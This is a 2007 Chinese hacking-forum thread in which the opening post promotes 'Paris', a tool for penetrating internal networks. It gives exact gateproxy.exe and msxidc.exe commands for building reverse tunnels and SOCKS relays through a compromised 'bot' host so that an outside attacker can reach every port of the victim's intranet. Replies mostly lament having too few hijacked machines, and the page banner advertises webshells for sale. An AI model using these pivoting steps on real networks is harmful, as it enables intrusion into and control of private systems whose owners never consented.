黑色技术

黑色技术 » 原创作品.[Member Public] » [原创]高级内网渗透工具:Paris

:炽天使远程控制软件 V3.0 免费版 下载    商人频道:出售WebShell  出售软件  出售源码  商品列表

 38  1/2 12››
 
打印 | 推荐 | 订阅 | 收藏
标题: [原创]高级内网渗透工具:Paris
小甜甜
论坛MVP
Rank: 4
从没被人加过分-_#



授予积极参加论坛活动的会员  
UID 2
精华 0
积分 732
帖子 180
阅读权限 50
注册 2007-11-10
状态 离线
楼主
使用道具  
发表于 2007-11-11 03:08 AM  资料  个人空间  短消息  加为好友 
[原创]高级内网渗透工具:Paris

来源:www.Rootkit.com.cn 作者:黑色技术成员[horseb]

Paris/0.2.1 (01/14/2007)
研究成果:
www.rootkit.com.cn
www.horseb.org
软件作者:horseb (黑色技术成员组 www.rootkit.com.cn )

此工具能够让你在内网渗透中事半功倍.让你的计算机属于对方内网的状态。
使用方法:
目前流行的httptunnel其实还属于正向隧道,有WINDOWS OS的防火墙或ipsec端口过滤比较严格的话,没办法使用,而且现在的通道除了VPN比较可靠安全,其他都不可靠。

Paris经过使用比较安全可靠
目前主要有下面的用法:
1.入侵内网时,在能占领的出口或代理主机上运行softrouter,外网softrouter server 可以关联内网主机这样在外网就很方便的控制内网主机。
2. 如果内网有一些有特殊应用服务的主机,但是不能通过公司的路由器配置映射到外网的,这里可以通过这个软件把相应端口映射到外网,这样外网就可以使用内网上某些资源,比如web站点。

使用Paris 建立 VPN方法:
如何建立VPN
1。方案
在202.106.0.202# gateproxy.exe-P2380 STLS=fcl SERVER=socks
在192.168.1.12# gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=202.106.0.202:2380

内网IP 192.168.1.12

肉鸡IP 202.106.0.202

如果肉鸡的端口能正向连接的话可以做的
先在肉鸡上执行在202.106.0.202# gateproxy.exe-P2380 STLS=fcl SERVER=socks
然后再在自己的机器上执行gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=202.106.0.202:2380

这样你的网络192.168.1.12 就可以访问 202.106.0.202 这台机器对应的内网的所有机器的所有端口了

QUOTE:
2.方案2
在202.106.0.202# gateproxy.exe-P2380 STLS=fcl SERVER=socks
在202.106.0.202# msxidc.exe -l127.0.0.1 -p2380 -m99 -s218.155.0.1 -r9001
在192.168.1.12# gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=218.155.0.1:99

这里说明一下,这里的msxidc.exe程序是Rootkit.com.cn 的软件路由程序
这里是为了解决肉鸡IP 202.106.0.202封正向端口的情况的,如果肉鸡IP 202.106.0.202:2380端口
连不上的话,就要用msxidc.exe把202.106.0.202:2380转到218.155.0.1:99的端口上,我们连接
218.155.0.1:99就等于连接上了肉鸡IP 202.106.0.202:2380了,这样就通过218.155.0.1:99端口
中转建立了和肉鸡202.106.0.202:2380的SSL VPN了
这里的218.155.0.1:9001 是softrouter的另外一个转发的侦听服务的端口

注意:这里必须要按照以上命令序列执行,否则不能连接上

附软件路由器的其他使用语法:
$$$$$$$$$$ software router version 0.01 $$$$$$$$$$$$$$

$$$$$$$$$$ copyright@2005 horse_b $$$$$$$$$$$$$$$$$$

msxidc -lVIM_IP -pVIMHOST_PORT -mMAP_MSvIDCs_PORT -sMSvIDCs_IP -rMSvIDCs_PORT

example:msxidc -l10.0.0.1 -p1433 -m99 -s218.155.0.1 -r9001


内网要连到外面的主机 10.0.0.1 这台内网主机要提供给外网的服务端口 1433 在外网上映射成的端口99 外网softrouterserver 的IP218.155.0.1 外网softrouterserver 的PORT 9001

这样我们就能在外网访问 218.155.0.1:99 就随时访问内网的 10.0.0.1:1433

msxidc -MMAP_MSvIDCs_PORT -SMSvIDCs_IP -RMSvIDCs_PORT

example:msxidc -M99 -S218.155.0.1 -R9001

msxidc -PLOCALHOST_PORT -XMAP_MSvIDCs_PORT -YMSvIDCs_IP -ZMSvIDCs_PORT

example:msxidc -P1433 -X99 -Y218.155.0.1 -Z9001
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$



 附件: 您所在的用户组无法下载或查看附件
顶部
drexp
论坛首负




UID 142
精华 0
积分 -4
帖子 2
阅读权限 1
注册 2007-11-11
状态 离线
沙发
使用道具  
发表于 2007-11-11 04:35 PM  资料  个人空间  短消息  加为好友 
这么好东西···· 没人顶··········   我沙发······· 占个广告位嘎嘎

顶部
applelure
论坛首负




UID 150
精华 0
积分 -1
帖子 5
阅读权限 1
注册 2007-11-11
状态 离线
板凳
使用道具  
发表于 2007-11-11 06:29 PM  资料  个人空间  短消息  加为好友 
VPN?

顶部
lonewolf
管理员
Rank: 12Rank: 12Rank: 12


授予业绩突出的论坛管理人员  
UID 42
精华 0
积分 3912
帖子 703
阅读权限 200
注册 2007-11-10
状态 在线
地毯
使用道具  
发表于 2007-11-11 07:48 PM  资料  个人空间  短消息  加为好友 
兄弟,这是你的作品?

顶部
wuyin
论坛首负




UID 162
精华 0
积分 -66
帖子 12
阅读权限 1
注册 2007-11-11
状态 离线
第5楼
使用道具  
发表于 2007-11-11 10:07 PM  资料  个人空间  短消息  加为好友 
这个工具,我用不上呀@!
没有肉鸡

顶部
无心
论坛首负




UID 200
精华 0
积分 -5
帖子 1
阅读权限 1
注册 2007-11-12
状态 离线
第6楼
使用道具  
发表于 2007-11-12 03:06 PM  资料  个人空间  短消息  加为好友 
试用一 :) :) :) 下:)

顶部
85747227
版主
Rank: 7Rank: 7Rank: 7



授予版主  
UID 121
精华 1
积分 1029
帖子 359
阅读权限 100
注册 2007-11-11
状态 离线
第7楼
使用道具  
发表于 2007-11-13 11:11 AM  资料  个人空间  短消息  加为好友 
....``不知道是不是他的。
我只知道这贴是黑色 原创的..

顶部
0oo清风oo0
刚入黑道
Rank: 1



UID 344
精华 0
积分 0
帖子 6
阅读权限 10
注册 2007-11-14
状态 离线
第8楼
使用道具  
发表于 2007-11-14 09:36 PM  资料  个人空间  短消息  加为好友 
就是````我也就几台肉鸡```````不怎么用的上`````````

顶部
xxpy
刚入黑道
Rank: 1



UID 364
精华 0
积分 18
帖子 16
阅读权限 10
注册 2007-11-15
状态 离线
第9楼
使用道具  
发表于 2007-11-15 01:54 AM  资料  个人空间  短消息  加为好友 
是啊.肉鸡不多啊.............郁闷......

顶部
vepeta
刚入黑道
Rank: 1



UID 381
精华 0
积分 1
帖子 1
阅读权限 10
注册 2007-11-15
状态 离线
第10楼
使用道具  
发表于 2007-11-15 10:29 AM  资料  个人空间  短消息  加为好友 
看来学习的东西很多呀!
。。。。。。。。。。。

顶部
show_style
刚入黑道
Rank: 1



UID 370
精华 0
积分 6
帖子 6
阅读权限 10
注册 2007-11-15
状态 离线
第11楼
使用道具  
发表于 2007-11-16 03:01 AM  资料  个人空间  短消息  加为好友  添加 show_style 为MSN好友 通过MSN和 show_style 交谈
~~好东西啊。
邪八。。的吧?
~~~~~

顶部
iovejieba
论坛首负




UID 84
精华 0
积分 -20
帖子 4
阅读权限 1
注册 2007-11-10
状态 离线
第12楼
使用道具  
发表于 2007-11-18 04:13 PM  资料  个人空间  短消息  加为好友 
看着有点熟悉
不知道在哪见过 ```
呵呵

顶部
WAP
论坛首负




UID 559
精华 0
积分 -5
帖子 1
阅读权限 1
注册 2007-11-18
状态 离线
第13楼
使用道具  
发表于 2007-11-18 05:52 PM  资料  个人空间  短消息  加为好友 
是黑色的。。。。

顶部
rwi
论坛首负




UID 620
精华 0
积分 -36
帖子 5
阅读权限 1
注册 2007-11-19
状态 离线
第14楼
使用道具  
发表于 2007-11-19 09:44 PM  资料  个人空间  短消息  加为好友 
cain也不错的,不知道这个怎么样...

顶部
ptgroups
刚入黑道
Rank: 1



UID 623
精华 0
积分 1
帖子 1
阅读权限 10
注册 2007-11-19
状态 离线
第15楼
使用道具  
发表于 2007-11-19 09:50 PM  资料  个人空间  短消息  加为好友 
没有办法用啊.
msxidc.exe -l127.0.0.1 -p2380 -m99 -s218.155.0.1 -r9001
就出现
msIDC Init Success!!
msIDC Server Connect failure!!
IDCClient Exit,BYE.......!!

顶部
ericpeter
论坛首负




UID 1148
精华 0
积分 -7
帖子 4
阅读权限 1
注册 2007-12-2
状态 离线
第16楼
使用道具  
发表于 2007-12-2 09:32 PM  资料  个人空间  短消息  加为好友 
看着有点眼熟~~~好像在邪8也见过 ~~~~~~~~·

顶部
loer
刚入黑道
Rank: 1



UID 1171
精华 0
积分 29
帖子 14
阅读权限 10
注册 2007-12-3
状态 离线
第17楼
使用道具  
发表于 2007-12-3 07:11 AM  资料  个人空间  短消息  加为好友  添加 loer 为MSN好友 通过MSN和 loer 交谈
试试喔....................................

顶部
但丁
刚入黑道
Rank: 1



UID 1605
精华 0
积分 1
帖子 1
阅读权限 10
注册 2007-12-11
状态 离线
第18楼
使用道具  
发表于 2007-12-11 04:05 PM  资料  个人空间  短消息  加为好友 
不会渗透,

看不懂~~~

顶部
gk72
刚入黑道
Rank: 1



UID 5521
精华 0
积分 14
帖子 7
阅读权限 10
注册 2007-12-26
状态 离线
第19楼
使用道具  
发表于 2007-12-26 08:51 PM  资料  个人空间  短消息  加为好友 
浪费资源。
论坛被水燕

顶部
゛我非英雄丶
刚入黑道
Rank: 1



UID 5581
精华 0
积分 14
帖子 7
阅读权限 10
注册 2007-12-30
状态 离线
第20楼
使用道具  
发表于 2007-12-30 09:19 PM  资料  个人空间  短消息  加为好友  添加 ゛我非英雄丶 为MSN好友 通过MSN和 ゛我非英雄丶 交谈
严重支持啦!@!!!!!!!!!!顶起来啊

顶部
 38  1/2 12››
 


---------------------------------------------------------------------------------------
本论坛所有文章,发表者拥有版权,黑色技术论坛拥有展示权,转载请注明出处!
管理员:教主 Email+Msn:jiaozhu@China.Com Lone Wolf QQ:215371256
拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论!
鲁ICP备05013108号